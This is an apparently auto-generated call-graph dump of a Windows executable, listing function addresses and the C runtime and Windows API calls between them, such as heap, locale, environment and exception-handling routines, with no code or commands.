4830 401662 __invoke_watson 5 API calls 4829->4830 4832 40316b @_EH4_CallFilterFunc@8 4830->4832 4831->4829 4834 405c7b 4833->4834 4834->4828 4835 404800 4836 40480c SetLastError 4835->4836 4837 404814 _raise 4835->4837 4836->4837 4012 404348 4013 404032 __calloc_crt 67 API calls 4012->4013 4014 404352 4013->4014 4015 401aaa __init_pointers 67 API calls 4014->4015 4016 40435a 4015->4016 4838 401b8f TlsAlloc 4839 406c10 4840 406c22 4839->4840 4842 406c30 4839->4842 4841 401662 __invoke_watson 5 API calls 4840->4841 4841->4842 4017 404753 RtlInitializeCriticalSection 4018 405bd4 4019 405be6 4018->4019 4021 405bf4 @_EH4_CallFilterFunc@8 4018->4021 4022 401662 4019->4022 4023 40166a 4022->4023 4024 40166c IsDebuggerPresent 4022->4024 4023->4021 4030 4040c5 4024->4030 4027 4020c5 SetUnhandledExceptionFilter UnhandledExceptionFilter 4028 4020e2 __invoke_watson 4027->4028 4029 4020ea GetCurrentProcess TerminateProcess 4027->4029 4028->4029 4029->4021 4030->4027 4031 401d55 4032 401d61 _raise 4031->4032 4033 401d79 4032->4033 4034 403f64 __mtinitlocknum 67 API calls 4032->4034 4036 401e55 _raise 4032->4036 4035 401d87 4033->4035 4037 403f64 __mtinitlocknum 67 API calls 4033->4037 4034->4033 4038 401d95 4035->4038 4039 403f64 __mtinitlocknum 67 API calls 4035->4039 4037->4035 4040 401da3 4038->4040 4042 403f64 __mtinitlocknum 67 API calls 4038->4042 4039->4038 4041 401db1 4040->4041 4043 403f64 __mtinitlocknum 67 API calls 4040->4043 4044 403f64 __mtinitlocknum 67 API calls 4041->4044 4045 401dbf 4041->4045 4042->4040 4043->4041 4044->4045 4046 403f64 __mtinitlocknum 67 API calls 4045->4046 4048 401dd0 4045->4048 4046->4048 4047 4034ee __lock 67 API calls 4049 401dd8 4047->4049 4048->4047 4050 401de4 InterlockedDecrement 4049->4050 4051 401dfd 4049->4051 4050->4051 4053 401def 4050->4053 4065 401e61 4051->4065 4053->4051 4055 403f64 __mtinitlocknum 67 API calls 4053->4055 4055->4051 4056 4034ee __lock 67 API calls 4057 401e11 4056->4057 4058 401e42 4057->4058 4068 4036e5 4057->4068 4112 401e6d 4058->4112 4062 403f64 __mtinitlocknum 67 API calls 4062->4036 4115 403416 RtlLeaveCriticalSection 4065->4115 4067 401e0a 4067->4056 4069 401e26 4068->4069 4070 4036ee InterlockedDecrement 4068->4070 4069->4058 4082 40351f 4069->4082 4071 403704 InterlockedDecrement 4070->4071 4072 403707 4070->4072 4071->4072 4073 403711 InterlockedDecrement 4072->4073 4074 403714 4072->4074 4073->4074 4075 403721 4074->4075 4076 40371e InterlockedDecrement 4074->4076 4077 40372b InterlockedDecrement 4075->4077 4079 40372e 4075->4079 4076->4075 4077->4079 4078 403743 InterlockedDecrement 4078->4079 4079->4078 4080 403753 InterlockedDecrement 4079->4080 4081 40375c InterlockedDecrement 4079->4081 4080->4079 4081->4069 4083 4035a0 4082->4083 4084 403533 4082->4084 4085 4035ed 4083->4085 4086 403f64 __mtinitlocknum 67 API calls 4083->4086 4084->4083 4092 403f64 __mtinitlocknum 67 API calls 4084->4092 4095 403567 4084->4095 4099 403614 4085->4099 4140 405c97 4085->4140 4088 4035c1 4086->4088 4090 403f64 __mtinitlocknum 67 API calls 4088->4090 4096 4035d4 4090->4096 4091 403f64 __mtinitlocknum 67 API calls 4097 403595 4091->4097 4098 40355c 4092->4098 4093 403f64 __mtinitlocknum 67 API calls 4093->4099 4094 403653 4100 403f64 __mtinitlocknum 67 API calls 4094->4100 4101 403f64 __mtinitlocknum 67 API calls 4095->4101 4111 403588 4095->4111 4103 403f64 __mtinitlocknum 67 API calls 4096->4103 4104 403f64 __mtinitlocknum 67 API calls 4097->4104 4116 405e67 4098->4116 4099->4094 4102 403f64 67 API calls __mtinitlocknum 4099->4102 4106 403659 4100->4106 4107 40357d 4101->4107 4102->4099 4108 4035e2 4103->4108 4104->4083 4106->4058 4132 405e27 4107->4132 4110 403f64 __mtinitlocknum 67 API calls 4108->4110 4110->4085 4111->4091 4228 403416 RtlLeaveCriticalSection 4112->4228 4114 401e4f 4114->4062 4115->4067 4117 405e70 4116->4117 4131 405eed 4116->4131 4118 403f64 __mtinitlocknum 67 API calls 4117->4118 4119 405e81 4117->4119 4118->4119 4120 403f64 __mtinitlocknum 67 API calls 4119->4120 4122 405e93 4119->4122 4120->4122 4121 405ea5 4124 405eb7 4121->4124 4126 403f64 __mtinitlocknum 67 API calls 4121->4126 4122->4121 4123 403f64 __mtinitlocknum 67 API calls 4122->4123 4123->4121 4125 405ec9 4124->4125 4127 403f64 __mtinitlocknum 67 API calls 4124->4127 4128 405edb 4125->4128 4129 403f64 __mtinitlocknum 67 API calls 4125->4129 4126->4124 4127->4125 4130 403f64 __mtinitlocknum 67 API calls 4128->4130 4128->4131 4129->4128 4130->4131 4131->4095 4133 405e64 4132->4133 4135 405e30 4132->4135 4133->4111 4134 405e40 4136 405e52 4134->4136 4138 403f64 __mtinitlocknum 67 API calls 4134->4138 4135->4134 4137 403f64 __mtinitlocknum 67 API calls 4135->4137 4136->4133 4139 403f64 __mtinitlocknum 67 API calls 4136->4139 4137->4134 4138->4136 4139->4133 4141 405ca4 4140->4141 4227 40360d 4140->4227 4142 403f64 __mtinitlocknum 67 API calls 4141->4142 4143 405cac 4142->4143 4144 403f64 __mtinitlocknum 67 API calls 4143->4144 4145 405cb4 4144->4145 4146 403f64 __mtinitlocknum 67 API calls 4145->4146 4147 405cbc 4146->4147 4148 403f64 __mtinitlocknum 67 API calls 4147->4148 4149 405cc4 4148->4149 4150 403f64 __mtinitlocknum 67 API calls 4149->4150 4151 405ccc 4150->4151 4152 403f64 __mtinitlocknum 67 API calls 4151->4152 4153 405cd4 4152->4153 4154 403f64 __mtinitlocknum 67 API calls 4153->4154 4155 405cdb 4154->4155 4156 403f64 __mtinitlocknum 67 API calls 4155->4156 4157 405ce3 4156->4157 4158 403f64 __mtinitlocknum 67 API calls 4157->4158 4159 405ceb 4158->4159 4160 403f64 __mtinitlocknum 67 API calls 4159->4160 4161 405cf3 4160->4161 4162 403f64 __mtinitlocknum 67 API calls 4161->4162 4163 405cfb 4162->4163 4164 403f64 __mtinitlocknum 67 API calls 4163->4164 4165 405d03 4164->4165 4166 403f64 __mtinitlocknum 67 API calls 4165->4166 4167 405d0b 4166->4167 4168 403f64 __mtinitlocknum 67 API calls 4167->4168 4169 405d13 4168->4169 4170 403f64 __mtinitlocknum 67 API calls 4169->4170 4171 405d1b 4170->4171 4172 403f64 __mtinitlocknum 67 API calls 4171->4172 4173 405d23 4172->4173 4174 403f64 __mtinitlocknum 67 API calls 4173->4174 4175 405d2e 4174->4175 4176 403f64 __mtinitlocknum 67 API calls 4175->4176 4177 405d36 4176->4177 4178 403f64 __mtinitlocknum 67 API calls 4177->4178 4179 405d3e 4178->4179 4180 403f64 __mtinitlocknum 67 API calls 4179->4180 4181 405d46 4180->4181 4182 403f64 __mtinitlocknum 67 API calls 4181->4182 4183 405d4e 4182->4183 4184 403f64 __mtinitlocknum 67 API calls 4183->4184 4185 405d56 4184->4185 4186 403f64 __mtinitlocknum 67 API calls 4185->4186 4187 405d5e 4186->4187 4188 403f64 __mtinitlocknum 67 API calls 4187->4188 4189 405d66 4188->4189 4190 403f64 __mtinitlocknum 67 API calls 4189->4190 4191 405d6e 4190->4191 4192 403f64 __mtinitlocknum 67 API calls 4191->4192 4193 405d76 4192->4193 4194 403f64 __mtinitlocknum 67 API calls 4193->4194 4195 405d7e 4194->4195 4196 403f64 __mtinitlocknum 67 API calls 4195->4196 4197 405d86 4196->4197 4198 403f64 __mtinitlocknum 67 API calls 4197->4198 4199 405d8e 4198->4199 4200 403f64 __mtinitlocknum 67 API calls 4199->4200 4201 405d96 4200->4201 4202 403f64 __mtinitlocknum 67 API calls 4201->4202 4203 405d9e 4202->4203 4204 403f64 __mtinitlocknum 67 API calls 4203->4204 4205 405da6 4204->4205 4206 403f64 __mtinitlocknum 67 API calls 4205->4206 4207 405db4 4206->4207 4208 403f64 __mtinitlocknum 67 API calls 4207->4208 4209 405dbf 4208->4209 4210 403f64 __mtinitlocknum 67 API calls 4209->4210 4211 405dca 4210->4211 4212 403f64 __mtinitlocknum 67 API calls 4211->4212 4213 405dd5 4212->4213 4214 403f64 __mtinitlocknum 67 API calls 4213->4214 4215 405de0 4214->4215 4216 403f64 __mtinitlocknum 67 API calls 4215->4216 4217 405deb 4216->4217 4218 403f64 __mtinitlocknum 67 API calls 4217->4218 4219 405df6 4218->4219 4220 403f64 __mtinitlocknum 67 API calls 4219->4220 4221 405e01 4220->4221 4222 403f64 __mtinitlocknum 67 API calls 4221->4222 4223 405e0c 4222->4223 4224 403f64 __mtinitlocknum 67 API calls 4223->4224 4225 405e17 4224->4225 4226 403f64 __mtinitlocknum 67 API calls 4225->4226 4226->4227 4227->4093 4228->4114 3937 407a59 3938 407a70 3937->3938 3943 407ade 3937->3943 3938->3943 3950 407a98 GetModuleHandleA 3938->3950 3939 407b24 3963 407b29 3939->3963 3940 407ae7 GetModuleHandleA 3944 407af1 3940->3944 3943->3939 3943->3940 3943->3944 3944->3943 3945 407b11 GetProcAddress 3944->3945 3945->3943 3946 407a8f 3946->3943 3946->3944 3947 407ab2 GetProcAddress 3946->3947 3947->3943 3948 407abf VirtualProtect 3947->3948 3948->3943 3949 407ace VirtualProtect 3948->3949 3949->3943 3951 407aa1 3950->3951 3952 407ade 3950->3952 3971 407ab5 GetProcAddress 3951->3971 3954 407b24 3952->3954 3955 407ae7 GetModuleHandleA 3952->3955 3958 407af1 3952->3958 3957 407b29 75 API calls 3954->3957 3955->3958 3956 407aa6 3956->3952 3959 407ab2 GetProcAddress 3956->3959 3957->3954 3958->3952 3958->3958 3962 407b11 GetProcAddress 3958->3962 3959->3952 3960 407abf VirtualProtect 3959->3960 3960->3952 3961 407ace VirtualProtect 3960->3961 3961->3952 3962->3952 3964 4018b6 3963->3964 3988 403196 3964->3988 3966 4016d6 _raise 3967 4016e2 GetStartupInfoA GetProcessHeap RtlAllocateHeap 3966->3967 3968 401714 3967->3968 3980 401671 3968->3980 3970 40171b _raise 3970->3939 3972 407ade 3971->3972 3973 407abf VirtualProtect 3971->3973 3975 407b24 3972->3975 3976 407ae7 GetModuleHandleA 3972->3976 3973->3972 3974 407ace VirtualProtect 3973->3974 3974->3972 3977 407b29 75 API calls 3975->3977 3978 407af1 3976->3978 3977->3975 3978->3972 3979 407b11 GetProcAddress 3978->3979 3979->3978 3981 40167a 3980->3981 3982 40167f 3980->3982 3983 402605 __FF_MSGBANNER 67 API calls 3981->3983 3984 402465 __FF_MSGBANNER 67 API calls 3982->3984 3983->3982 3985 401688 3984->3985 3986 402193 _fast_error_exit 3 API calls 3985->3986 3987 401692 3986->3987 3987->3970 3989 4031c6 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3988->3989 3990 4031b9 3988->3990 3991 4031bd 3989->3991 3990->3989 3990->3991 3991->3966 4229 4023d9 4232 4022f7 4229->4232 4231 4023e6 4233 402303 _raise 4232->4233 4234 4034ee __lock 67 API calls 4233->4234 4235 40230a 4234->4235 4236 402379 _raise 4235->4236 4238 401b21 _raise 67 API calls 4235->4238 4252 4023c4 4236->4252 4240 402339 4238->4240 4242 401b21 _raise 67 API calls 4240->4242 4241 4023c1 _raise 4241->4231 4246 402347 4242->4246 4244 4023b8 4245 402193 _fast_error_exit 3 API calls 4244->4245 4245->4241 4246->4236 4248 401b21 _raise 67 API calls 4246->4248 4249 401b18 4246->4249 4248->4246 4250 401aaa __init_pointers 67 API calls 4249->4250 4251 401b1f 4250->4251 4251->4246 4253 4023a5 4252->4253 4254 4023ca 4252->4254 4253->4241 4256 403416 RtlLeaveCriticalSection 4253->4256 4257 403416 RtlLeaveCriticalSection 4254->4257 4256->4244 4257->4253 4258 402c5b 4273 402f98 4258->4273 4260 402c67 GetStartupInfoA 4261 404032 __calloc_crt 67 API calls 4260->4261 4267 402c88 4261->4267 4262 402e92 _raise 4263 402e0f GetStdHandle 4268 402dd9 4263->4268 4264 404032 __calloc_crt 67 API calls 4264->4267 4265 402e74 SetHandleCount 4265->4262 4266 402e21 GetFileType 4266->4268 4267->4262 4267->4264 4267->4268 4270 402d5c 4267->4270 4268->4262 4268->4263 4268->4265 4268->4266 4269 404763 ___crtInitCritSecAndSpinCount 67 API calls 4268->4269 4269->4268 4270->4262 4270->4268 4271 402d85 GetFileType 4270->4271 4272 404763 ___crtInitCritSecAndSpinCount 67 API calls 4270->4272 4271->4270 4272->4270 4273->4260 4843 40279d 4844 4027a9 4843->4844 4847 4027ae 4843->4847 4845 403f46 ___initmbctable 111 API calls 4844->4845 4845->4847 4846 4027ea 4847->4846 4848 404cc7 __wincmdln 77 API calls 4847->4848 4848->4847 4274 401863 4277 40263f 4274->4277 4278 401cc6 _raise 67 API calls 4277->4278 4279 401874 4278->4279 4280 402265 4281 40226e __except_handler4 4280->4281 4286 4043c5 4281->4286 4283 40228d __initterm_e 4285 4022ae __except_handler4 4283->4285 4290 4043b3 4283->4290 4288 4043c9 4286->4288 4287 401aaa __init_pointers 67 API calls 4287->4288 4288->4287 4289 4043e1 4288->4289 4289->4283 4293 404377 4290->4293 4292 4043bc 4292->4285 4294 404383 _raise 4293->4294 4301 4021a8 4294->4301 4300 4043a4 _raise 4300->4292 4302 4034ee __lock 67 API calls 4301->4302 4303 4021af 4302->4303 4304 40428f 4303->4304 4305 401b21 _raise 67 API calls 4304->4305 4306 40429f 4305->4306 4307 401b21 _raise 67 API calls 4306->4307 4308 4042b0 4307->4308 4315 404333 4308->4315 4324 406b43 4308->4324 4310 401aaa __init_pointers 67 API calls 4311 404328 4310->4311 4313 401aaa __init_pointers 67 API calls 4311->4313 4312 4042ce 4316 4042f0 4312->4316 4320 404319 4312->4320 4337 40407a 4312->4337 4313->4315 4321 4043ad 4315->4321 4316->4315 4317 40407a __realloc_crt 73 API calls 4316->4317 4318 404307 4316->4318 4317->4318 4318->4315 4319 401aaa __init_pointers 67 API calls 4318->4319 4319->4320 4320->4310 4386 4021b1 4321->4386 4325 406b4f _raise 4324->4325 4326 406b7c 4325->4326 4327 406b5f 4325->4327 4329 406bbd RtlSizeHeap 4326->4329 4331 4034ee __lock 67 API calls 4326->4331 4328 40427c strtoxl 67 API calls 4327->4328 4330 406b64 4328->4330 4334 406b74 _raise 4329->4334 4332 40421d strtoxl 67 API calls 4330->4332 4333 406b8c ___sbh_find_block 4331->4333 4332->4334 4342 406bdd 4333->4342 4334->4312 4340 40407e 4337->4340 4339 4040c0 4339->4316 4340->4339 4341 4040a1 Sleep 4340->4341 4346 406835 4340->4346 4341->4340 4345 403416 RtlLeaveCriticalSection 4342->4345 4344 406bb8 4344->4329 4344->4334 4345->4344 4347 406841 _raise 4346->4347 4348 406856 4347->4348 4349 406848 4347->4349 4351 406869 4348->4351 4352 40685d 4348->4352 4350 406654 _malloc 67 API calls 4349->4350 4373 406850 _raise _realloc 4350->4373 4358 4069db 4351->4358 4370 406876 _realloc ___sbh_resize_block ___sbh_find_block 4351->4370 4353 403f64 __mtinitlocknum 67 API calls 4352->4353 4353->4373 4354 406a0e 4357 404832 _malloc 67 API calls 4354->4357 4355 4069e0 RtlReAllocateHeap 4355->4358 4355->4373 4356 4034ee __lock 67 API calls 4356->4370 4359 406a14 4357->4359 4358->4354 4358->4355 4360 406a32 4358->4360 4362 404832 _malloc 67 API calls 4358->4362 4365 406a28 4358->4365 4361 40427c strtoxl 67 API calls 4359->4361 4363 40427c strtoxl 67 API calls 4360->4363 4360->4373 4361->4373 4362->4358 4364 406a3b GetLastError 4363->4364 4364->4373 4367 40427c strtoxl 67 API calls 4365->4367 4380 4069a9 4367->4380 4368 406901 RtlAllocateHeap 4368->4370 4369 406956 RtlReAllocateHeap 4369->4370 4370->4354 4370->4356 4370->4368 4370->4369 4372 405861 ___sbh_alloc_block 5 API calls 4370->4372 4370->4373 4374 4069c1 4370->4374 4375 404832 _malloc 67 API calls 4370->4375 4378 4069a4 4370->4378 4381 4050b8 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 4370->4381 4382 406979 4370->4382 4371 4069ae GetLastError 4371->4373 4372->4370 4373->4340 4374->4373 4376 40427c strtoxl 67 API calls 4374->4376 4375->4370 4377 4069ce 4376->4377 4377->4364 4377->4373 4379 40427c strtoxl 67 API calls 4378->4379 4379->4380 4380->4371 4380->4373 4381->4370 4385 403416 RtlLeaveCriticalSection 4382->4385 4384 406980 4384->4370 4385->4384 4389 403416 RtlLeaveCriticalSection 4386->4389 4388 4021b8 4388->4300 4389->4388 4849 402b26 4850 402b42 GetEnvironmentStringsW 4849->4850 4851 402b61 4849->4851 4852 402b56 GetLastError 4850->4852 4853 402b4a 4850->4853 4851->4853 4854 402bfc 4851->4854 4852->4851 4855 402b8b WideCharToMultiByte 4853->4855 4856 402b7c GetEnvironmentStringsW 4853->4856 4857 402c04 GetEnvironmentStrings 4854->4857 4859 402b84 4854->4859 4861 402bf1 FreeEnvironmentStringsW 4855->4861 4862 402bbf 4855->4862 4856->4855 4856->4859 4857->4859 4860 402c14 4857->4860 4863 403ff2 __malloc_crt 67 API calls 4860->4863 4861->4859 4864 403ff2 __malloc_crt 67 API calls 4862->4864 4865 402c2d 4863->4865 4866 402bc5 4864->4866 4867 402c40 _realloc 4865->4867 4868 402c34 FreeEnvironmentStringsA 4865->4868 4866->4861 4869 402bce WideCharToMultiByte 4866->4869 4872 402c48 FreeEnvironmentStringsA 4867->4872 4868->4859 4870 402be8 4869->4870 4871 402bdf 4869->4871 4870->4861 4873 403f64 __mtinitlocknum 67 API calls 4871->4873 4872->4859 4873->4870 4874 4210ae 4875 4210cd 4874->4875 4877 42115b 4875->4877 4879 421170 4877->4879 4880 4018b6 4879->4880 4881 403196 ___security_init_cookie 5 API calls 4880->4881 4882 4016d6 _raise 4881->4882 4883 4016e2 GetStartupInfoA GetProcessHeap RtlAllocateHeap 4882->4883 4884 401714 4883->4884 4885 401671 _fast_error_exit 67 API calls 4884->4885 4886 40171b _raise 4885->4886 4393 402a6d 4394 402a80 4393->4394 4395 402a85 GetModuleFileNameA 4393->4395 4404 403f46 4394->4404 4397 402aac 4395->4397 4408 4028d5 4397->4408 4399 402b08 4401 403ff2 __malloc_crt 67 API calls 4402 402aee 4401->4402 4402->4399 4403 4028d5 _parse_cmdline 77 API calls 4402->4403 4403->4399 4405 403f56 4404->4405 4406 403f4f 4404->4406 4405->4395 4414 403dac 4406->4414 4410 4028f2 4408->4410 4412 40295f 4410->4412 4666 404cc7 4410->4666 4411 402a5d 4411->4399 4411->4401 4412->4411 4413 404cc7 77 API calls __wincmdln 4412->4413 4413->4412 4415 403db8 _raise 4414->4415 4416 401d3d __setmbcp 67 API calls 4415->4416 4417 403dc1 4416->4417 4445 403a33 4417->4445 4419 403dcb 4461 403b59 4419->4461 4422 403ff2 __malloc_crt 67 API calls 4423 403dec 4422->4423 4424 403f0b _raise 4423->4424 4468 403bd3 4423->4468 4424->4405 4427 403f18 4427->4424 4433 403f64 __mtinitlocknum 67 API calls 4427->4433 4437 403f2b 4427->4437 4428 403e1c InterlockedDecrement 4429 403e2c 4428->4429 4430 403e3d InterlockedIncrement 4428->4430 4429->4430 4431 403f64 __mtinitlocknum 67 API calls 4429->4431 4430->4424 4432 403e53 4430->4432 4435 403e3c 4431->4435 4432->4424 4436 4034ee __lock 67 API calls 4432->4436 4433->4437 4434 40427c strtoxl 67 API calls 4434->4424 4435->4430 4439 403e67 InterlockedDecrement 4436->4439 4437->4434 4440 403ee3 4439->4440 4441 403ef6 InterlockedIncrement 4439->4441 4440->4441 4443 403f64 __mtinitlocknum 67 API calls 4440->4443 4478 403f0d 4441->4478 4444 403ef5 4443->4444 4444->4441 4446 403a3f _raise 4445->4446 4447 401d3d __setmbcp 67 API calls 4446->4447 4448 403a44 4447->4448 4449 4034ee __lock 67 API calls 4448->4449 4450 403a56 4448->4450 4451 403a74 4449->4451 4453 403a64 _raise 4450->4453 4457 402149 __amsg_exit 67 API calls 4450->4457 4452 403abd 4451->4452 4454 403aa5 InterlockedIncrement 4451->4454 4455 403a8b InterlockedDecrement 4451->4455 4481 403ace 4452->4481 4453->4419 4454->4452 4455->4454 4458 403a96 4455->4458 4457->4453 4458->4454 4459 403f64 __mtinitlocknum 67 API calls 4458->4459 4460 403aa4 4459->4460 4460->4454 4485 403ad7 4461->4485 4464 403b94 4466 403b99 GetACP 4464->4466 4467 403b86 4464->4467 4465 403b76 GetOEMCP 4465->4467 4466->4467 4467->4422 4467->4424 4469 403b59 getSystemCP 79 API calls 4468->4469 4470 403bf1 4469->4470 4472 403c40 IsValidCodePage 4470->4472 4475 403bfc setSBCS 4470->4475 4477 403c65 _memset __setmbcp 4470->4477 4471 401662 __invoke_watson 5 API calls 4473 403daa 4471->4473 4474 403c52 GetCPInfo 4472->4474 4472->4475 4473->4427 4473->4428 4474->4475 4474->4477 4475->4471 4520 4038a9 GetCPInfo 4477->4520 4665 403416 RtlLeaveCriticalSection 4478->4665 4480 403f14 4480->4424 4484 403416 RtlLeaveCriticalSection 4481->4484 4483 403ad5 4483->4450 4484->4483 4486 403ae6 4485->4486 4492 403b33 4485->4492 4487 401d3d __setmbcp 67 API calls 4486->4487 4488 403aeb 4487->4488 4489 403b13 4488->4489 4493 4037af 4488->4493 4491 403a33 __setmbcp 69 API calls 4489->4491 4489->4492 4491->4492 4492->4464 4492->4465 4494 4037bb _raise 4493->4494 4495 401d3d __setmbcp 67 API calls 4494->4495 4496 4037c0 4495->4496 4497 4037ee 4496->4497 4499 4037d2 4496->4499 4498 4034ee __lock 67 API calls 4497->4498 4500 4037f5 4498->4500 4501 401d3d __setmbcp 67 API calls 4499->4501 4508 403771 4500->4508 4503 4037d7 4501->4503 4506 4037e5 _raise 4503->4506 4507 402149 __amsg_exit 67 API calls 4503->4507 4506->4489 4507->4506 4509 403775 4508->4509 4510 4037a7 4508->4510 4509->4510 4511 40365f ___addlocaleref 8 API calls 4509->4511 4516 403819 4510->4516 4512 403788 4511->4512 4512->4510 4513 4036e5 ___removelocaleref 8 API calls 4512->4513 4514 403793 4513->4514 4514->4510 4515 40351f ___freetlocinfo 67 API calls 4514->4515 4515->4510 4519 403416 RtlLeaveCriticalSection 4516->4519 4518 403820 4518->4503 4519->4518 4521 4038e0 _memset 4520->4521 4522 403989 4520->4522 4530 406192 4521->4530 4526 401662 __invoke_watson 5 API calls 4522->4526 4528 403a2b 4526->4528 4528->4477 4529 4065c2 ___crtLCMapStringA 102 API calls 4529->4522 4531 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4530->4531 4532 4061a3 4531->4532 4540 405fda 4532->4540 4535 4065c2 4536 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4535->4536 4537 4065d3 4536->4537 4618 406220 4537->4618 4541 406024 4540->4541 4542 405ff9 GetStringTypeW 4540->4542 4543 40610b 4541->4543 4544 406011 4541->4544 4542->4544 4545 406019 GetLastError 4542->4545 4568 406e83 GetLocaleInfoA 4543->4568 4546 40605d MultiByteToWideChar 4544->4546 4563 406105 4544->4563 4545->4541 4552 40608a 4546->4552 4546->4563 4549 401662 __invoke_watson 5 API calls 4550 403944 4549->4550 4550->4535 4551 40615c GetStringTypeA 4555 406177 4551->4555 4551->4563 4556 40609f _memset __alloca_probe_16 4552->4556 4557 406654 _malloc 67 API calls 4552->4557 4554 4060d8 MultiByteToWideChar 4559 4060ee GetStringTypeW 4554->4559 4560 4060ff 4554->4560 4561 403f64 __mtinitlocknum 67 API calls 4555->4561 4556->4554 4556->4563 4557->4556 4559->4560 4564 405ef0 4560->4564 4561->4563 4563->4549 4565 405f09 4564->4565 4566 405ef8 4564->4566 4565->4563 4566->4565 4567 403f64 __mtinitlocknum 67 API calls 4566->4567 4567->4565 4569 406eb4 4568->4569 4570 406eaf 4568->4570 4599 406e72 4569->4599 4572 401662 __invoke_watson 5 API calls 4570->4572 4573 40612f 4572->4573 4573->4551 4573->4563 4574 406eca 4573->4574 4575 406f08 GetCPInfo 4574->4575 4579 406f92 4574->4579 4576 406f7d MultiByteToWideChar 4575->4576 4577 406f1f 4575->4577 4576->4579 4581 406f38 _strlen 4576->4581 4577->4576 4580 406f25 GetCPInfo 4577->4580 4578 401662 __invoke_watson 5 API calls 4582 406150 4578->4582 4579->4578 4580->4576 4583 406f32 4580->4583 4584 406f6a _memset __alloca_probe_16 4581->4584 4585 406654 _malloc 67 API calls 4581->4585 4582->4551 4582->4563 4583->4576 4583->4581 4584->4579 4586 406fc7 MultiByteToWideChar 4584->4586 4585->4584 4587 406ffe 4586->4587 4588 406fdf 4586->4588 4589 405ef0 __freea 67 API calls 4587->4589 4590 407003 4588->4590 4591 406fe6 WideCharToMultiByte 4588->4591 4589->4579 4592 407022 4590->4592 4593 40700e WideCharToMultiByte 4590->4593 4591->4587 4594 404032 __calloc_crt 67 API calls 4592->4594 4593->4587 4593->4592 4595 40702a 4594->4595 4595->4587 4596 407033 WideCharToMultiByte 4595->4596 4596->4587 4597 407045 4596->4597 4598 403f64 __mtinitlocknum 67 API calls 4597->4598 4598->4587 4602 407396 4599->4602 4603 4073ad 4602->4603 4606 40716b 4603->4606 4607 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4606->4607 4610 40717e 4607->4610 4608 407190 4609 40427c strtoxl 67 API calls 4608->4609 4611 407195 4609->4611 4610->4608 4614 4071cd 4610->4614 4612 40421d strtoxl 67 API calls 4611->4612 4617 406e7f 4612->4617 4613 40707c __isctype_l 91 API calls 4613->4614 4614->4613 4615 407212 4614->4615 4616 40427c strtoxl 67 API calls 4615->4616 4615->4617 4616->4617 4617->4570 4619 40623f LCMapStringW 4618->4619 4623 40625a 4618->4623 4620 406262 GetLastError 4619->4620 4619->4623 4620->4623 4621 406457 4625 406e83 ___ansicp 91 API calls 4621->4625 4622 4062b4 4624 4062cd MultiByteToWideChar 4622->4624 4647 40644e 4622->4647 4623->4621 4623->4622 4633 4062fa 4624->4633 4624->4647 4627 40647f 4625->4627 4626 401662 __invoke_watson 5 API calls 4628 403964 4626->4628 4629 406573 LCMapStringA 4627->4629 4630 406498 4627->4630 4627->4647 4628->4529 4664 4064cf 4629->4664 4631 406eca ___convertcp 74 API calls 4630->4631 4635 4064aa 4631->4635 4632 40634b MultiByteToWideChar 4636 406364 LCMapStringW 4632->4636 4658 406445 4632->4658 4634 406654 _malloc 67 API calls 4633->4634 4642 406313 __alloca_probe_16 4633->4642 4634->4642 4638 4064b4 LCMapStringA 4635->4638 4635->4647 4640 406385 4636->4640 4636->4658 4637 40659a 4644 403f64 __mtinitlocknum 67 API calls 4637->4644 4637->4647 4650 4064d6 4638->4650 4638->4664 4639 405ef0 __freea 67 API calls 4639->4647 4643 40638d 4640->4643 4649 4063b6 4640->4649 4641 403f64 __mtinitlocknum 67 API calls 4641->4637 4642->4632 4642->4647 4648 40639f LCMapStringW 4643->4648 4643->4658 4644->4647 4645 4064e7 _memset __alloca_probe_16 4657 406525 LCMapStringA 4645->4657 4645->4664 4646 4063d1 __alloca_probe_16 4651 406405 LCMapStringW 4646->4651 4646->4658 4647->4626 4648->4658 4649->4646 4652 406654 _malloc 67 API calls 4649->4652 4650->4645 4653 406654 _malloc 67 API calls 4650->4653 4654 40641d WideCharToMultiByte 4651->4654 4655 40643f 4651->4655 4652->4646 4653->4645 4654->4655 4656 405ef0 __freea 67 API calls 4655->4656 4656->4658 4659 406541 4657->4659 4660 406545 4657->4660 4658->4639 4663 405ef0 __freea 67 API calls 4659->4663 4662 406eca ___convertcp 74 API calls 4660->4662 4662->4659 4663->4664 4664->4637 4664->4641 4665->4480 4669 404c76 4666->4669 4670 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4669->4670 4671 404c87 4670->4671 4671->4410 4672 406bf0 RtlUnwind 4673 4040f1 4674 4040f4 4673->4674 4677 406a50 4674->4677 4678 406a75 4677->4678 4679 406a7c 4677->4679 4680 402465 __FF_MSGBANNER 67 API calls 4678->4680 4689 404578 4679->4689 4680->4679 4683 406a8d _memset 4685 406b3b 4683->4685 4688 406b10 SetUnhandledExceptionFilter UnhandledExceptionFilter 4683->4688 4713 4023ea 4685->4713 4688->4685 4690 401b21 _raise 67 API calls 4689->4690 4691 404583 4690->4691 4691->4683 4692 404585 4691->4692 4694 404591 _raise 4692->4694 4693 4045ed 4696 4045ce 4693->4696 4699 4045fc 4693->4699 4694->4693 4695 4045b8 4694->4695 4694->4696 4701 4045b4 4694->4701 4697 401cc6 _raise 67 API calls 4695->4697 4698 401b21 _raise 67 API calls 4696->4698 4702 4045bd _siglookup 4697->4702 4698->4702 4700 40427c strtoxl 67 API calls 4699->4700 4703 404601 4700->4703 4701->4695 4701->4699 4705 404663 4702->4705 4706 4023ea _raise 67 API calls 4702->4706 4707 4045c6 _raise 4702->4707 4704 40421d strtoxl 67 API calls 4703->4704 4704->4707 4708 4034ee __lock 67 API calls 4705->4708 4709 40466e 4705->4709 4706->4705 4707->4683 4708->4709 4710 401b18 _raise 67 API calls 4709->4710 4711 4046a3 4709->4711 4710->4711 4716 4046f9 4711->4716 4714 4022f7 _raise 67 API calls 4713->4714 4715 4023f7 4714->4715 4717 404706 4716->4717 4718 4046ff 4716->4718 4717->4707 4720 403416 RtlLeaveCriticalSection 4718->4720 4720->4717 4721 401e76 GetModuleHandleA 4722 401e91 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4721->4722 4723 401e88 4721->4723 4725 401edb TlsAlloc 4722->4725 4754 401bca 4723->4754 4728 401ff5 4725->4728 4729 401f29 TlsSetValue 